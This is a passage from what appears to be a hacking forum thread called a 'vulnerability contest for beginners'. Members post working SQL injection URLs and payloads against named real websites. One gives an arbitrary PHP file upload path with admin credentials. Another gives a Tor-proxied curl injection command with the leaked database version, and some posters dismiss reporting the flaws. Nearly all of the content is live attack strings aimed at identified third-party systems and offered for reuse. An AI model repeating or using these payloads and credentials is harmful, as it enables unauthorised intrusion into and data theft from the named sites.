Vulnerability contest for beginners

Discussion in 'Sandbox' started by yarbabin, 1 Jun 2015.

  1. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    783
    Likes Received:
    912
    Reputations:
    58
    No idea why people post sites that have already been hacked over and over; here is yet another challenge
    PHP:
    |
    http://www.canterburyct.org/department.php?id=(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
    ||
    http://www.canterburyct.org/department.php?id=11))+AND+FALSE+union+select+1,2,3,4,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),6,7,8,9,10,11+--+-

    I didn't bother with the queries, I just copied whatever came to hand; the point was something else.
    Thanks, Dr.Z3r0
    HTML:
    http://www.jurui-cn.com/military.php?id=9++and+false UNION%0Aselect+1,2,3,4,5,6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+-
    
     
    #141 BabaDook, 22 Dec 2017
    Last edited: 22 Dec 2017
  2. BabaDook

    PHP:
    https://ukrmarket.net/chn/tag/" and substring(version(),1,1)=5+--+-
    https://ukrmarket.net/chn/tag/" and substring(version(),1,1)=4+--+-
    + file reading.
    
     
  3. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    400
    Likes Received:
    64
    Reputations:
    18
    Arbitrary file upload 1.php.asd
    
    You can collect sites with Google
     
    #143 Octavian, 1 Feb 2018
    Last edited: 1 Feb 2018
    BabaDook likes this.
  4. BabaDook

    To be honest, unfortunately I didn't understand anything; please spell out where the vulnerability is.
     
  5. Octavian

    We can upload PHP files
    L:fm_admin
    P:fm_admin
    Code:
    http://ecaterix.md/ecaterix.md/kcfinder/upload/files/filemanager.php.asd
    
     
    BabaDook likes this.
  6. BabaDook

    PHP:
    http://www.termo.karelia.ru/weather/w_history.php?town=msk&month=4&year='+UnIon+SeLEct+user(),null,null,null,null+--+_
     
  7. BabaDook

    karkajoi likes this.
  8. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,762
    Likes Received:
    6,559
    Reputations:
    96
    Everything there is full of holes, wherever you poke...
    Reporting it is useless: they write back that everything has been fixed and everything works.
    Code:
    curl -s -k --proxy socks5://127.0.0.1:9150 http://onesecurity.zyxel.com/php/wizard.php --data "instruction=get_wizards&parameters%5Btype%5D=z%27 union select 1,@@version--+&parameters%5Bdirection%5D=DESC&parameters%5Bget_active%5D=true"
    
    "Microsoft SQL Server 2005 - 9.00.5057.00 (Intel X86) Mar 25 2011 13:50:04 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 6.0 (Build 6002: Service Pack 2)"
     
    Jerri, man474019, Veil and 1 other person like this.
  9. karkajoi

    karkajoi Member

    Joined:
    26 Oct 2016
    Messages:
    136
    Likes Received:
    64
    Reputations:
    1
    + sql inject
    Code:
    http://www.task.ua/funds/?id=1&language='and updatexml(NULL,concat(0x0a,(SELECT database())),Null)-- -
    
     
    HeReTiC, ms13, crlf and 1 other person like this.
  10. BabaDook
